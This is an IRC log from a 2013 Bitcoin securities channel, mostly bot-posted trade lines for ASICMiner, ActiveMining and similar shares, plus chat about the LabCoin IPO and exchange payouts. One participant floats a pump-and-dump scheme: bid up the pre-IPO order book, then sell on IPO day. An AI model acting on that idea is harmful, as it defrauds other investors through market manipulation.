[BTCT.CO] - Details/FAQ and Discussion (ASIC dev/sales/mining) Jul 31 10:39:08 ipo walls behave like regular ask orders, correct? Jul 31 10:39:28 why wouldnt they Jul 31 10:40:12 heh Jul 31 10:40:24 do 4600btc just got sucked out of AMC and AM to early bid on labcoin Jul 31 10:40:27 oh well, all you can do is sit back and watch the madness Jul 31 10:40:35 so* Jul 31 10:40:39 [BTCTC] [TAT.ASICMINER] 4 @ 0.04151 = 0.166 BTC [-] Jul 31 10:40:41 [BTCTC] [ASICMINER-PT] 2 @ 4.2 = 8.4 BTC [-] Jul 31 10:40:48 the natives are restless Jul 31 10:41:01 [BTCTC] [ASICMINER-PT] 2 @ 4.55 = 9.1 BTC [+] Jul 31 10:41:28 [BTCTC] [ACTIVEMINING] 25 @ 0.004809 = 0.1202 BTC [-] Jul 31 10:41:30 [BTCTC] [ACTIVEMINING] 33 @ 0.004808 = 0.1587 BTC [-] Jul 31 10:41:32 [BTCTC] [ACTIVEMINING] 50 @ 0.004807 = 0.2404 BTC [-] Jul 31 10:41:35 [BTCTC] [ACTIVEMINING] 37 @ 0.004806 = 0.1778 BTC [-] Jul 31 10:41:38 [BTCTC] [ACTIVEMINING] 5 @ 0.004805 = 0.024 BTC [-] Jul 31 10:41:40 [BTCTC] [ACTIVEMINING] 86 @ 0.004801 = 0.4129 BTC [-] Jul 31 10:41:40 they complain no matter what, Jul 31 10:41:40 [BTCTC] [ACTIVEMINING] 44 @ 0.0048 = 0.2112 BTC [-] Jul 31 10:41:42 [BTCTC] [ACTIVEMINING] 1220 @ 0.0048 = 5.856 BTC [-] Jul 31 10:41:56 you announce IPO too quickly and people miss out Jul 31 10:42:05 you announce to early and people get bid out Jul 31 10:42:06 i hope trading begins soon.. replacing bids and a pre-ipo ralley would create so much rage i guess Jul 31 10:42:15 true Jul 31 10:42:49 what they dont realize, is if they bid it up before it's even live Jul 31 10:43:06 no one makes the money from bidding it up except the issuer Jul 31 10:43:19 you secure your shares Jul 31 10:43:35 yes, shares you are speculatively buying Jul 31 10:43:40 becaus eyou want them to go up Jul 31 10:44:04 how much up is left if everyone pays max price pre-IPO Jul 31 10:44:53 [BTCTC] [ASICMINER-PT] 1 @ 4.2 BTC [-] Jul 31 10:45:03 [BTCTC] [ASICMINER-PT] 1 @ 4.15 BTC [-] Jul 31 10:45:08 i get your point, but what would be the best "game strategy"? Jul 31 10:45:27 wait til labcoin announced the IPO date Jul 31 10:45:33 [BTCTC] [ACTIVEMINING] 395 @ 0.0083 = 3.2785 BTC [+] Jul 31 10:45:35 then bid then Jul 31 10:45:48 VanCleef lol what is btcgarden even ? Jul 31 10:45:56 another labcoin Jul 31 10:46:02 oh mp you're going to love it Jul 31 10:46:02 [BTCTC] [TAT.ASICMINER] 6 @ 0.04151 = 0.2491 BTC [-] Jul 31 10:46:09 with added chinese language and chip fsoftware screenshots Jul 31 10:46:24 [BTCTC] [ASICMINER-PT] 1 @ 4.2 BTC [+] Jul 31 10:46:28 [BTCTC] [TAT.ASICMINER] 13 @ 0.04151 = 0.5396 BTC [-] Jul 31 10:46:44 [BTCTC] [TAT.ASICMINER] 1 @ 0.04151 BTC [-] Jul 31 10:46:52 i'm actually being really kind because because a 2million lost of shares will be sold for more than 0.016 btc Jul 31 10:46:52 [BTCTC] [ACTIVEMINING] 50 @ 0.004808 = 0.2404 BTC [-] Jul 31 10:46:57 [BTCTC] [TAT.ASICMINER] 50 @ 0.0415 = 2.075 BTC [-] Jul 31 10:47:01 [BTCTC] [ACTIVEMINING] 35 @ 0.004807 = 0.1682 BTC [-] Jul 31 10:47:03 [BTCTC] [TAT.ASICMINER] 40 @ 0.0413 = 1.652 BTC [-] Jul 31 10:47:08 [BTCTC] [ACTIVEMINING] 5 @ 0.004805 = 0.024 BTC [-] Jul 31 10:47:11 [BTCTC] [TAT.ASICMINER] 5 @ 0.04125 = 0.2063 BTC [-] Jul 31 10:47:13 [BTCTC] [ACTIVEMINING] 2780 @ 0.0048 = 13.344 BTC [-] Jul 31 10:47:13 at the minium based on what btc is worth today they're valuing themselves at around 160 million Jul 31 10:47:14 [BTCTC] [TAT.ASICMINER] 3 @ 0.0411 = 0.1233 BTC [-] Jul 31 10:47:17 [BTCTC] [TAT.ASICMINER] 4 @ 0.04102 = 0.1641 BTC [-] Jul 31 10:47:20 [BTCTC] [TAT.ASICMINER] 10 @ 0.04101 = 0.4101 BTC [-] Jul 31 10:47:20 heh. Jul 31 10:47:30 lot* Jul 31 10:47:31 so basically everyone wants to be mpoe on their say so Jul 31 10:47:33 [BTCTC] [TAT.ASICMINER] 3 @ 0.04101 = 0.123 BTC [-] Jul 31 10:47:40 hehe Jul 31 10:47:41 and why shouldn't they, because on the internet nobody can be a dog against their will Jul 31 10:47:49 [BTCTC] [TAT.ASICMINER] 13 @ 0.041001 = 0.533 BTC [-] Jul 31 10:47:51 [BTCTC] [TAT.ASICMINER] 9 @ 0.041 = 0.369 BTC [-] Jul 31 10:48:08 meanwhile all the cretinous americans buying btc for dollars and giving it to scammers are doing btc a huge disservice. Jul 31 10:48:21 i wish more people listened back when i was saying we really DON'T want more noobs. Jul 31 10:50:19 [BTCTC] [DMS.MINING] 14 @ 0.008131 = 0.1138 BTC [+] Jul 31 10:50:30 [HAVELOCK] [AM1] 2 @ 4.24 = 8.48 BTC [-] Jul 31 10:50:33 [HAVELOCK] [AM1] 4 @ 4.22 = 16.88 BTC [-] Jul 31 10:50:43 btct cant even issue ipo's properly Jul 31 10:50:46 [BTCTC] [BITVPS] 400 @ 0.00179 = 0.716 BTC [-] Jul 31 10:50:50 [BTCTC] [BITVPS] 148 @ 0.001781 = 0.2636 BTC [-] Jul 31 10:50:52 [BTCTC] [BITVPS] 300 @ 0.001781 = 0.5343 BTC [-] Jul 31 10:50:54 [BTCTC] [BITVPS] 10 @ 0.001751 = 0.0175 BTC [-] Jul 31 10:50:58 [BTCTC] [BITVPS] 200 @ 0.001702 = 0.3404 BTC [-] Jul 31 10:50:58 rename it ebay instead Jul 31 10:51:01 [BTCTC] [BITVPS] 100 @ 0.001701 = 0.1701 BTC [-] Jul 31 10:51:04 [BTCTC] [BITVPS] 250 @ 0.0017 = 0.425 BTC [-] Jul 31 10:51:06 [BTCTC] [BITVPS] 1 @ 0.0017 BTC [-] Jul 31 10:51:35 [BTCTC] [ASICMINER-PT] 1 @ 4.197 BTC [-] Jul 31 10:51:41 [HAVELOCK] [SDSTM] 1 @ 0.00888 BTC [-] Jul 31 10:51:44 one man's properly is another's wtf Jul 31 10:52:04 [HAVELOCK] [SDSTM] 1 @ 0.00823 BTC [-] Jul 31 10:52:06 [HAVELOCK] [AM1] 5 @ 4.1 = 20.5 BTC [-] Jul 31 10:52:17 [HAVELOCK] [AM1] 1 @ 4.1 BTC [-] Jul 31 10:54:49 [BTCTC] [ACTIVEMINING] 3991 @ 0.0083 = 33.1253 BTC [+] Jul 31 10:55:06 [BTCTC] [ASICMINER-PT] 3 @ 4.12 = 12.36 BTC [-] Jul 31 10:55:16 [BTCTC] [ASICMINER-PT] 4 @ 4.12 = 16.48 BTC [-] Jul 31 10:55:32 [BTCTC] [ASICMINER-PT] 2 @ 4.12 = 8.24 BTC [-] Jul 31 10:55:59 [BTCTC] [ASICMINER-PT] 1 @ 4.111 BTC [-] Jul 31 10:56:04 [BTCTC] [ASICMINER-PT] 1 @ 4.11 BTC [-] Jul 31 10:56:07 [BTCTC] [ASICMINER-PT] 10 @ 4.104 = 41.04 BTC [-] Jul 31 10:56:09 [HAVELOCK] [AM1] 1 @ 4 BTC [-] Jul 31 10:56:12 [HAVELOCK] [AM1] 1 @ 3.9 BTC [-] Jul 31 10:57:45 [HAVELOCK] [AM100] 69 @ 0.0387003 = 2.6703 BTC [-] Jul 31 10:57:48 [HAVELOCK] [AM100] 5 @ 0.03870011 = 0.1935 BTC [-] Jul 31 10:57:50 [HAVELOCK] [AM100] 211 @ 0.0387 = 8.1657 BTC [-] Jul 31 10:58:18 [BTCTC] [ASICMINER-PT] 1 @ 4.105 BTC [+] Jul 31 11:02:07 [BTCTC] [ASICMINER-PT] 1 @ 4.189 BTC [+] Jul 31 11:02:19 [BTCTC] [ACTIVEMINING] 25 @ 0.005264 = 0.1316 BTC [-] Jul 31 11:02:21 [BTCTC] [ACTIVEMINING] 5 @ 0.005265 = 0.0263 BTC [+] Jul 31 11:02:33 [BTCTC] [ASICMINER-PT] 1 @ 4.45 BTC [+] Jul 31 11:03:13 [HAVELOCK] [SMG] 1265 @ 0.0002511 = 0.3176 BTC [-] Jul 31 11:04:22 [HAVELOCK] [HIM] 2 @ 0.14 = 0.28 BTC [+] Jul 31 11:05:21 [BTCTC] [TAT.MINIGAME] 8877 @ 0.00028 = 2.4856 BTC [-] Jul 31 11:05:23 [BTCTC] [BASIC-MINING] 2 @ 0.4033 = 0.8066 BTC [-] Jul 31 11:05:26 [MPEX] [S.MG] 10000 @ 0.0002675 = 2.675 BTC [+] Jul 31 11:05:55 [BTCTC] [ACTIVEMINING] 3 @ 0.004851 = 0.0146 BTC [-] Jul 31 11:05:59 [BTCTC] [ACTIVEMINING] 4 @ 0.004851 = 0.0194 BTC [-] Jul 31 11:06:47 [BTCTC] [BITVPS] 100 @ 0.001645 = 0.1645 BTC [-] Jul 31 11:07:35 [BTCTC] [TAT.ASICMINER] 86 @ 0.04125 = 3.5475 BTC [+] Jul 31 11:07:37 [BTCTC] [TAT.ASICMINER] 26 @ 0.04125 = 1.0725 BTC [+] Jul 31 11:07:38 [MPEX] [S.MPOE] 1850 @ 0.0008028 = 1.4852 BTC [-] Jul 31 11:07:40 [BTCTC] [TAT.ASICMINER] 25 @ 0.041 = 1.025 BTC [-] Jul 31 11:07:46 [BTCTC] [TAT.ASICMINER] 1 @ 0.041 BTC [-] Jul 31 11:07:48 [BTCTC] [TAT.ASICMINER] 30 @ 0.041 = 1.23 BTC [-] Jul 31 11:07:52 [BTCTC] [TAT.ASICMINER] 28 @ 0.041 = 1.148 BTC [-] Jul 31 11:08:32 [BTCTC] [GSDPT] 52 @ 0.003356 = 0.1745 BTC [-] Jul 31 11:09:49 [BTCTC] [TAT.ASICMINER] 3 @ 0.041 = 0.123 BTC [-] Jul 31 11:09:57 [BTCTC] [TAT.ASICMINER] 7 @ 0.041 = 0.287 BTC [-] Jul 31 11:12:14 [BTCTC] [ASICMINER-PT] 1 @ 4.106 BTC [-] Jul 31 11:12:39 [BTCTC] [TAT.ASICMINER] 1 @ 0.041 BTC [-] Jul 31 11:12:56 ;;bcstats Jul 31 11:12:58 ;;estimate Jul 31 11:12:59 Current Blocks: 249394 | Current Difficulty: 3.125696072776893E7 | Next Difficulty At Block: 249983 | Next Difficulty In: 589 blocks | Next Difficulty In About: 3 days, 0 hours, 7 minutes, and 20 seconds | Next Difficulty Estimate: None | Estimated Percent Change: None Jul 31 11:13:00 Next difficulty estimate | None based on data since last change | 41333750.3648 based on data for last three days Jul 31 11:13:27 ;;nethash Jul 31 11:13:27 295883.02488 Jul 31 11:13:53 [BTCTC] [TAT.MINIGAME] 1 @ 0.0002724 BTC [-] Jul 31 11:14:33 [BTCTC] [ASICMINER-PT] 1 @ 4.105 BTC [-] Jul 31 11:15:17 [BTCTC] [ASICMINER-PT] 8 @ 4.105 = 32.84 BTC [-] Jul 31 11:15:20 [BTCTC] [ASICMINER-PT] 12 @ 4.101 = 49.212 BTC [-] Jul 31 11:17:06 [BTCTC] [ASICMINER-PT] 1 @ 4.1 BTC [-] Jul 31 11:17:15 [BTCTC] [ASICMINER-PT] 1 @ 4.1 BTC [-] Jul 31 11:17:18 [BTCTC] [ASICMINER-PT] 1 @ 4.1 BTC [-] Jul 31 11:17:21 [BTCTC] [ASICMINER-PT] 19 @ 4.1 = 77.9 BTC [-] Jul 31 11:18:03 [BTCTC] [DMS.MINING] 20 @ 0.008133 = 0.1627 BTC [+] Jul 31 11:18:05 [BTCTC] [DMS.MINING] 1200 @ 0.008132 = 9.7584 BTC [-] Jul 31 11:18:12 [BTCTC] [DMS.MINING] 30 @ 0.00813 = 0.2439 BTC [-] Jul 31 11:18:14 [BTCTC] [DMS.MINING] 4 @ 0.0081 = 0.0324 BTC [-] Jul 31 11:18:16 [BTCTC] [DMS.MINING] 4 @ 0.007906 = 0.0316 BTC [-] Jul 31 11:18:17 any eta on those labcoin shares being released Jul 31 11:18:19 [BTCTC] [DMS.MINING] 2 @ 0.007904 = 0.0158 BTC [-] Jul 31 11:18:22 [BTCTC] [DMS.MINING] 69 @ 0.007201 = 0.4969 BTC [-] Jul 31 11:18:25 [BTCTC] [DMS.MINING] 1000 @ 0.0072 = 7.2 BTC [-] Jul 31 11:18:29 when you least expect them Jul 31 11:18:34 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.002783 = 0.2783 BTC [-] Jul 31 11:18:36 [BTCTC] [TAT.VIRTUALMINE] 50 @ 0.002782 = 0.1391 BTC [-] Jul 31 11:18:38 [BTCTC] [TAT.VIRTUALMINE] 40 @ 0.00278 = 0.1112 BTC [-] Jul 31 11:18:42 [BTCTC] [TAT.VIRTUALMINE] 580 @ 0.00258 = 1.4964 BTC [-] Jul 31 11:18:44 [BTCTC] [TAT.VIRTUALMINE] 41 @ 0.002579 = 0.1057 BTC [-] Jul 31 11:18:45 uh www.btct.to changed it's layout ;) Jul 31 11:18:46 [BTCTC] [TAT.VIRTUALMINE] 41 @ 0.002444 = 0.1002 BTC [-] Jul 31 11:18:48 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00235 BTC [-] Jul 31 11:18:59 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0023 BTC [-] Jul 31 11:19:02 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0022 BTC [-] Jul 31 11:19:16 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0022 BTC [-] Jul 31 11:19:17 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.002122 BTC [-] Jul 31 11:19:19 [BTCTC] [TAT.VIRTUALMINE] 6 @ 0.002121 = 0.0127 BTC [-] Jul 31 11:19:36 [BTCTC] [BASIC-MINING] 19 @ 0.4033 = 7.6627 BTC [-] Jul 31 11:19:38 [BTCTC] [BASIC-MINING] 3 @ 0.4033 = 1.2099 BTC [-] Jul 31 11:19:40 [BTCTC] [BASIC-MINING] 12 @ 0.4032 = 4.8384 BTC [-] Jul 31 11:19:42 [BTCTC] [BASIC-MINING] 2 @ 0.4006 = 0.8012 BTC [-] Jul 31 11:19:44 [BTCTC] [BASIC-MINING] 10 @ 0.3935 = 3.935 BTC [-] Jul 31 11:20:24 [BTCTC] [BASIC-MINING] 10 @ 0.3932 = 3.932 BTC [-] Jul 31 11:20:38 [BTCTC] [TAT.ASICMINER] 4 @ 0.04052 = 0.1621 BTC [-] Jul 31 11:20:49 [BTCTC] [TAT.ASICMINER] 5 @ 0.0402 = 0.201 BTC [-] Jul 31 11:20:54 [BTCTC] [TAT.VIRTUALMINE] 137 @ 0.00212 = 0.2904 BTC [-] Jul 31 11:20:54 [BTCTC] [TAT.ASICMINER] 5 @ 0.0401 = 0.2005 BTC [-] Jul 31 11:20:56 [BTCTC] [ASICMINER-PT] 1 @ 4.07 BTC [-] Jul 31 11:20:57 [BTCTC] [TAT.ASICMINER] 20 @ 0.0401 = 0.802 BTC [-] Jul 31 11:21:12 [BTCTC] [ASICMINER-PT] 2 @ 4.07 = 8.14 BTC [-] Jul 31 11:21:20 [BTCTC] [TAT.ASICMINER] 25 @ 0.04009 = 1.0023 BTC [-] Jul 31 11:21:26 [BTCTC] [TAT.ASICMINER] 50 @ 0.040003 = 2.0002 BTC [-] Jul 31 11:21:47 [BTCTC] [ASICMINER-PT] 1 @ 4.071 BTC [+] Jul 31 11:21:51 [BTCTC] [ASICMINER-PT] 9 @ 4.07 = 36.63 BTC [-] Jul 31 11:22:46 [BTCTC] [TAT.ASICMINER] 2 @ 0.040002 = 0.08 BTC [-] Jul 31 11:22:52 [BTCTC] [TAT.ASICMINER] 25 @ 0.04 = 1 BTC [-] Jul 31 11:22:54 [BTCTC] [TAT.ASICMINER] 1 @ 0.04 BTC [-] Jul 31 11:23:00 [BTCTC] [TAT.ASICMINER] 1 @ 0.04 BTC [-] Jul 31 11:23:18 [BTCTC] [TAT.ASICMINER] 1 @ 0.04 BTC [-] Jul 31 11:23:24 [BTCTC] [TAT.ASICMINER] 1 @ 0.04 BTC [-] Jul 31 11:23:27 [BTCTC] [TAT.ASICMINER] 2 @ 0.04 = 0.08 BTC [-] Jul 31 11:23:30 [BTCTC] [TAT.ASICMINER] 15 @ 0.04 = 0.6 BTC [-] Jul 31 11:23:45 [BTCTC] [ASICMINER-PT] 7 @ 4.07 = 28.49 BTC [-] Jul 31 11:24:03 [BTCTC] [RSM] 13 @ 0.01377 = 0.179 BTC [-] Jul 31 11:24:05 [BTCTC] [ASICMINER-PT] 1 @ 4.4 BTC [+] Jul 31 11:24:21 sell EVERYTHING Jul 31 11:24:23 naoooo Jul 31 11:24:36 pretty much Jul 31 11:24:39 [BTCTC] [ACTIVEMINING] 25 @ 0.004964 = 0.1241 BTC [+] Jul 31 11:24:49 gotta get the labcoin pokemon Jul 31 11:25:04 [HAVELOCK] [HIM] 1 @ 0.14 BTC [+] Jul 31 11:25:08 [BTCTC] [TAT.ASICMINER] 1 @ 0.039 BTC [-] Jul 31 11:25:13 [BTCTC] [ASICMINER-PT] 1 @ 4.06 BTC [-] Jul 31 11:25:19 [BTCTC] [ASICMINER-PT] 1 @ 4.06 BTC [-] Jul 31 11:25:46 we should put like 3000 more btc on the labcoin orderbook Jul 31 11:25:51 [BTCTC] [TAT.ASICMINER] 54 @ 0.03852 = 2.0801 BTC [-] Jul 31 11:25:52 [BTCTC] [ACTIVEMINING] 100 @ 0.005 = 0.5 BTC [+] Jul 31 11:25:54 make it look sold out pre-ipo Jul 31 11:25:57 [BTCTC] [TAT.ASICMINER] 1 @ 0.0385 BTC [-] Jul 31 11:26:02 [BTCTC] [TAT.ASICMINER] 3 @ 0.0384 = 0.1152 BTC [-] Jul 31 11:26:04 [BTCTC] [TAT.ASICMINER] 6 @ 0.0384 = 0.2304 BTC [-] Jul 31 11:26:04 run up price Jul 31 11:26:08 [BTCTC] [TAT.ASICMINER] 25 @ 0.0382 = 0.955 BTC [-] Jul 31 11:26:12 then bail on IPO day Jul 31 11:26:15 [BTCTC] [TAT.ASICMINER] 30 @ 0.038 = 1.14 BTC [-] Jul 31 11:26:17 [BTCTC] [TAT.ASICMINER] 6 @ 0.03601 = 0.2161 BTC [-] Jul 31 11:26:23 [BTCTC] [TAT.ASICMINER] 1 @ 0.036001 BTC [-] Jul 31 11:26:27 [BTCTC] [TAT.ASICMINER] 6 @ 0.03501 = 0.2101 BTC [-] Jul 31 11:26:29 [BTCTC] [TAT.ASICMINER] 20 @ 0.03501 = 0.7002 BTC [-] Jul 31 11:26:33 [BTCTC] [TAT.ASICMINER] 10 @ 0.035 = 0.35 BTC [-] Jul 31 11:26:34 i think the expression is "sell all the things" Jul 31 11:26:35 [BTCTC] [TAT.ASICMINER] 100 @ 0.035 = 3.5 BTC [-] Jul 31 11:26:38 [BTCTC] [TAT.ASICMINER] 30 @ 0.035 = 1.05 BTC [-] Jul 31 11:26:59 well, issue has some real names attached Jul 31 11:27:16 that's pretty amazing in the BTC world Jul 31 11:27:19 [BTCTC] [TAT.ASICMINER] 1 @ 0.035 BTC [-] Jul 31 11:27:25 how real? Jul 31 11:27:26 names as in who ? Jul 31 11:27:33 like first name last name Jul 31 11:27:39 or people people actually know Jul 31 11:27:39 yup Jul 31 11:27:47 lol mk Jul 31 11:27:52 no edgy names Jul 31 11:27:56 or weird blogs Jul 31 11:28:05 just boring first name last names Jul 31 11:28:11 it's so rare it bleeds what can i tell you. Jul 31 11:28:28 you mean like me or erik or josh rossi or etc ? Jul 31 11:28:51 yeh, but it's a TEAM Jul 31 11:28:54 the names arent it Jul 31 11:28:58 of first name last names Jul 31 11:29:03 lol it's a team Jul 31 11:29:07 people "got rich" buying AMC Jul 31 11:29:11 and AM Jul 31 11:29:19 now everyone wants to get rich Jul 31 11:29:34 so they turn IPOs into bitcoin gems Jul 31 11:29:46 the problem with 5000 people getting rich offa fiddy bucks Jul 31 11:29:57 is that the first guy to spend 50 bucks has made everyone dirt poor again Jul 31 11:32:55 http://www.eve-tribune.com/index.php?no=1_27&page=7 Jul 31 11:32:59 Eve Tribune Jul 31 11:32:59 somewhat on topic Jul 31 11:33:28 [BTCTC] [DMS.MINING] 2 @ 0.007104 = 0.0142 BTC [-] Jul 31 11:33:30 [BTCTC] [DMS.MINING] 1696 @ 0.007103 = 12.0467 BTC [-] Jul 31 11:34:21 [BTCTC] [TAT.ASICMINER] 6 @ 0.03899 = 0.2339 BTC [+] Jul 31 11:34:24 [BTCTC] [TAT.ASICMINER] 29 @ 0.039 = 1.131 BTC [+] Jul 31 11:34:54 [BTCTC] [ASICMINER-PT] 1 @ 4.5 BTC [+] Jul 31 11:36:23 DMS is at 0.0014206 per mhs Jul 31 11:36:26 [BTCTC] [ACTIVEMINING] 1 @ 0.004963 BTC [-] Jul 31 11:36:33 [BTCTC] [ACTIVEMINING] 1 @ 0.004959 BTC [-] Jul 31 11:36:35 [BTCTC] [ACTIVEMINING] 1 @ 0.00485 BTC [-] Jul 31 11:36:37 [BTCTC] [ACTIVEMINING] 100 @ 0.0048 = 0.48 BTC [-] Jul 31 11:36:39 [BTCTC] [ACTIVEMINING] 2 @ 0.004772 = 0.0095 BTC [-] Jul 31 11:36:41 [BTCTC] [ACTIVEMINING] 1 @ 0.00477 BTC [-] Jul 31 11:36:54 [BTCTC] [ACTIVEMINING] 16 @ 0.00472 = 0.0755 BTC [-] Jul 31 11:37:15 [BTCTC] [ACTIVEMINING] 1 @ 0.004719 BTC [-] Jul 31 11:37:17 [BTCTC] [ACTIVEMINING] 32 @ 0.004716 = 0.1509 BTC [-] Jul 31 11:37:20 [BTCTC] [ACTIVEMINING] 500 @ 0.004704 = 2.352 BTC [-] Jul 31 11:37:22 [BTCTC] [ACTIVEMINING] 274 @ 0.004703 = 1.2886 BTC [-] Jul 31 11:37:25 [BTCTC] [ACTIVEMINING] 100 @ 0.004703 = 0.4703 BTC [-] Jul 31 11:37:27 [BTCTC] [ASICMINER-PT] 1 @ 4.05 BTC [-] Jul 31 11:37:28 [BTCTC] [ACTIVEMINING] 50 @ 0.004701 = 0.2351 BTC [-] Jul 31 11:37:32 [BTCTC] [ACTIVEMINING] 995 @ 0.0047 = 4.6765 BTC [-] Jul 31 11:37:34 [BTCTC] [ASICMINER-PT] 1 @ 4.05 BTC [-] Jul 31 11:37:38 [BTCTC] [ASICMINER-PT] 1 @ 4.05 BTC [-] Jul 31 11:37:39 [BTCTC] [ACTIVEMINING] 43 @ 0.004552 = 0.1957 BTC [-] Jul 31 11:37:41 [BTCTC] [ACTIVEMINING] 208 @ 0.004551 = 0.9466 BTC [-] Jul 31 11:37:43 [BTCTC] [ASICMINER-PT] 1 @ 4.05 BTC [-] Jul 31 11:37:43 [BTCTC] [ACTIVEMINING] 1000 @ 0.004551 = 4.551 BTC [-] Jul 31 11:37:45 [BTCTC] [ACTIVEMINING] 100 @ 0.00455 = 0.455 BTC [-] Jul 31 11:37:47 [BTCTC] [ACTIVEMINING] 1000 @ 0.00455 = 4.55 BTC [-] Jul 31 11:37:48 [BTCTC] [ACTIVEMINING] 3200 @ 0.00452 = 14.464 BTC [-] Jul 31 11:37:50 [BTCTC] [ACTIVEMINING] 1750 @ 0.004505 = 7.8838 BTC [-] Jul 31 11:37:52 [BTCTC] [ACTIVEMINING] 1700 @ 0.004503 = 7.6551 BTC [-] Jul 31 11:37:53 [BTCTC] [ACTIVEMINING] 65 @ 0.004502 = 0.2926 BTC [-] Jul 31 11:37:55 [BTCTC] [ACTIVEMINING] 2000 @ 0.004502 = 9.004 BTC [-] Jul 31 11:37:58 [BTCTC] [ACTIVEMINING] 100 @ 0.004501 = 0.4501 BTC [-] Jul 31 11:38:00 [BTCTC] [ACTIVEMINING] 10 @ 0.0045 = 0.045 BTC [-] Jul 31 11:38:02 [BTCTC] [ACTIVEMINING] 3000 @ 0.0045 = 13.5 BTC [-] Jul 31 11:38:04 [BTCTC] [ACTIVEMINING] 2876 @ 0.0045 = 12.942 BTC [-] Jul 31 11:38:11 ActM on sale, haf-price! Jul 31 11:41:24 [HAVELOCK] [VTX] 4 @ 0.4957 = 1.9828 BTC [+] Jul 31 11:41:30 https://forums.eveonline.com/default.aspx?g=posts&m=3249400 Jul 31 11:41:34 Interstellar Stock Exchange - EVE Technology Lab - EVE Online Forums Jul 31 11:41:36 [HAVELOCK] [VTX] 2 @ 0.4956 = 0.9912 BTC [-] Jul 31 11:41:41 [HAVELOCK] [VTX] 1 @ 0.495 BTC [-] Jul 31 11:41:41 lmao "Stock exchanges for EVE do not exist because of lack of trust and accountability." Jul 31 11:41:59 good time learn how to be a Bitcoin Stock Exchanger Issuer Jul 31 11:42:58 time to grab popcorn Jul 31 11:43:23 ur get fat from so much popcorn Jul 31 11:44:02 bitcoin made me fat! Jul 31 11:44:11 in more ways than one Jul 31 11:44:25 mircea_popescu there? Jul 31 11:44:29 yes Jul 31 11:44:41 jurov yeah. Jul 31 11:44:56 I asked DT about sdice payout, he said he's been waiting for you to process his withdraw request ? Jul 31 11:45:00 can you confirm that at all? Jul 31 11:45:10 or at least state all payouts have been handled. Jul 31 11:45:31 jurov basically i intend to just bridge them through 1BTC corp shares <-> s.mpoe shares Jul 31 11:45:43 as imo any other avenue is unworkable for those reason Jul 31 11:46:24 Ukyo last set of payouts went out ~1 hour ago. i don't see anything pending Jul 31 11:46:38 thanks Jul 31 11:48:55 [BTCTC] [ACTIVEMINING] 25 @ 0.004701 = 0.1175 BTC [+] Jul 31 11:48:59 [BTCTC] [ACTIVEMINING] 104 @ 0.0047 = 0.4888 BTC [-] Jul 31 11:49:07 [BTCTC] [ACTIVEMINING] 1 @ 0.005197 BTC [+] Jul 31 11:49:30 [BTCTC] [ACTIVEMINING] 25 @ 0.004501 = 0.1125 BTC [-] Jul 31 11:49:32 [BTCTC] [ACTIVEMINING] 875 @ 0.0045 = 3.9375 BTC [-] Jul 31 11:52:36 https://bitcointalk.org/index.php?topic=265252.msg2837791#msg2837791 Jul 31 11:52:41 What is a healthy securities portfolio? Jul 31 11:53:46 [BTCTC] [BITVPS] 100 @ 0.001645 = 0.1645 BTC [-] Jul 31 11:58:33 [BTCTC] [ACTIVEMINING] 25 @ 0.004523 = 0.1131 BTC [+] Jul 31 11:58:55 [BTCTC] [ACTIVEMINING] 62 @ 0.004522 = 0.2804 BTC [-] Jul 31 11:59:27 [BTCTC] [ACTIVEMINING] 100 @ 0.00452 = 0.452 BTC [-] Jul 31 11:59:30 [HAVELOCK] [AM100] 1 @ 0.03900001 BTC [+] Jul 31 11:59:34 [HAVELOCK] [AM100] 2 @ 0.039 = 0.078 BTC [-] Jul 31 11:59:38 [HAVELOCK] [AM100] 34 @ 0.0386 = 1.3124 BTC [-] Jul 31 11:59:42 [HAVELOCK] [AM100] 18 @ 0.03851 = 0.6932 BTC [-] Jul 31 11:59:51 [BTCTC] [ACTIVEMINING] 25 @ 0.00451 = 0.1128 BTC [-] Jul 31 11:59:56 [BTCTC] [ACTIVEMINING] 50 @ 0.004501 = 0.2251 BTC [-] Jul 31 12:00:27 [BTCTC] [ACTIVEMINING] 1249 @ 0.0045 = 5.6205 BTC [-] Jul 31 12:00:35 valid q. Jul 31 12:01:56 mircea_popescu: can you check for and possibly run any payouts? :P Jul 31 12:02:08 sounds like someone fucked up their number of 0's hehe Jul 31 12:02:32 he said he fucked up the 0's and apologizes Jul 31 12:03:23 [BTCTC] [ACTIVEMINING] 900 @ 0.0045 = 4.05 BTC [-] Jul 31 12:03:52 [BTCTC] [ACTIVEMINING] 2222 @ 0.0045 = 9.999 BTC [-] Jul 31 12:04:18 [BTCTC] [ACTIVEMINING] 100 @ 0.0043 = 0.43 BTC [-] Jul 31 12:04:20 [BTCTC] [ACTIVEMINING] 300 @ 0.0042 = 1.26 BTC [-] Jul 31 12:04:30 Ukyo, tell dt to update pympex Jul 31 12:04:38 [BTCTC] [ACTIVEMINING] 1000 @ 0.0045 = 4.5 BTC [+] Jul 31 12:04:39 [BTCTC] [ACTIVEMINING] 191 @ 0.00418 = 0.7984 BTC [-] Jul 31 12:05:02 last version does try to parse withdrawals and convert to BTC Jul 31 12:05:20 [BTCTC] [ACTIVEMINING] 309 @ 0.00418 = 1.2916 BTC [-] Jul 31 12:06:02 [BTCTC] [ACTIVEMINING] 1 @ 0.004125 BTC [-] Jul 31 12:06:04 [BTCTC] [ACTIVEMINING] 25 @ 0.004201 = 0.105 BTC [+] Jul 31 12:06:07 [BTCTC] [TAT.ASICMINER] 50 @ 0.03849 = 1.9245 BTC [-] Jul 31 12:06:09 [BTCTC] [ACTIVEMINING] 1000 @ 0.0042 = 4.2 BTC [-] Jul 31 12:06:11 [BTCTC] [TAT.ASICMINER] 50 @ 0.03849 = 1.9245 BTC [-] Jul 31 12:06:15 [BTCTC] [ACTIVEMINING] 1500 @ 0.0042 = 6.3 BTC [-] Jul 31 12:06:17 [BTCTC] [ACTIVEMINING] 1200 @ 0.004125 = 4.95 BTC [-] Jul 31 12:06:22 [BTCTC] [ACTIVEMINING] 579 @ 0.004103 = 2.3756 BTC [-] Jul 31 12:06:55 [BTCTC] [TAT.ASICMINER] 25 @ 0.0385 = 0.9625 BTC [+] Jul 31 12:06:57 [BTCTC] [COG.F] 1 @ 7.1 BTC [-] Jul 31 12:07:18 [BTCTC] [TAT.ASICMINER] 75 @ 0.0385 = 2.8875 BTC [+] Jul 31 12:11:08 Ukyo aite 